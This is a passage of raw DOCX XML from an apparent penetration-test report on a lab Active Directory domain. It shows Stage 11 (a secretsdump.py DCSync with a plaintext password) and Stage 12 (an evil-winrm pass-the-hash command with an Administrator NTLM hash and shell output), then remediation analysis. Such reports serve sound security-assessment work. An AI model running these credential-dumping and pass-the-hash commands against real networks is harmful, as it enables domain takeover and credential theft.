          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="4A296FE2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="59130812" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">secretsdump.py </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ttimmons:'Repeat09'@172.16.8.3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -just-dc-ntlm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32B606AC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C2AB899" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>As captured in Figure 14, secretsdump.py simulated a Domain Controller replication request and extracted the complete NTDS.DIT database, including the NTLM hash of Domain Administrator: fd1f7e5564060258ea787ddbb6e6afa2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF87D54" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="308B2303" wp14:editId="33C5A2A5">
            <wp:extent cx="8025080" cy="15521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stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="8025080" cy="1552103"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ECDEC0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 14: Impacket secretsdump.py Performing DCSync Replication Dumping NTLM Hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2A406B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>5.12 Stage 12: Proof of Domain Compromise (Pass-the-Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F62C74" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>To confirm absolute domain takeover without password cracking, the extracted Administrator NTLM hash was used in a Pass-the-Hash (PtH) attack via evil-winrm directly against Domain Controller DC01.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1420FA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Command Invocation: </w:t>
      </w:r>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Command Execution Syntax:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="5EAC0E59" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B41F190" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>evil-winrm -i 172.16.8.3 -u Administrator -H fd1f7e5564060258ea787ddbb6e6afa2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BDCEA84" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Shell output:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="651DB58C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hostname   # DC01</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FCAB5C5" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>whoami     # inlanefreight\administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09AF46A0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="243516E2" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Figure 15 demonstrates interactive administrative shell access on Domain Controller DC01 as inlanefreight\administrator, proving 100% domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BB9CC4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A8AFCD5" wp14:editId="45BC5D57">
            <wp:extent cx="5460920" cy="2028825"/>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sync-graph.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5481217" cy="2036366"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F79DBAC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:before="40"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Figure 15: BloodHound Full Attack Path Visualizing Chained Escalation from hporter to DCSync Domain Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED58D6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:r w:rsidRPr="0040297F">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C75CD41" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6. Analysis and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E500356" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.1 Root Cause &amp; Cumulative Risk Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9CFA73" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>The successful compromise of INLANEFREIGHT.LOCAL demonstrates a fundamental security principle: total system compromise is rarely the result of a single catastrophic flaw. Instead, it is the cumulative effect of small, unmonitored misconfigurations that create an unbroken attack chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3740B929" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>In this engagement, 10 distinct misconfigurations were chained together. If even ONE of the critical links in this chain (such as file share script permissions, Sysax service isolation, LSA autologon storage, targeted SPN delegation, or extended replication rights) had been properly hardened, the attack path would have been severed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490C3A41" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>6.2 Misconfiguration Impact Summary Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752399B7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Table 3 summarizes the 10 root-cause misconfigurations exploited during the assessment, detailing their individual severity and contribution to domain compromise:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="576"/>
        <w:gridCol w:w="3168"/>
        <w:gridCol w:w="1584"/>
        <w:gridCol w:w="4032"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="2B0C8CEF" w14:textId="77777777" w:rsidTr="00162A9A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71CCF3F8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5EB85FE9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Identified Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6244605C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="743186C8" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Impact &amp; Role in Attack Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="748E686A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1B87846B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="38EFBD4F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ForceChangePassword ACL Delegation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="603E61A1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="543446D6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Allowed account takeover of ssmalls without password knowledge.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="0651CF2B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1648A132" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7B5CCA36" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Plaintext Credentials in Share Script</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="31C66BA9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4032" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="241CF78E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Exposed backupadm credentials on accessible IT share.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="4566CFA0" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="576" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0B854A2A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3168" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="137AE0D0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Excessive Service Account WinRM Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F4F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
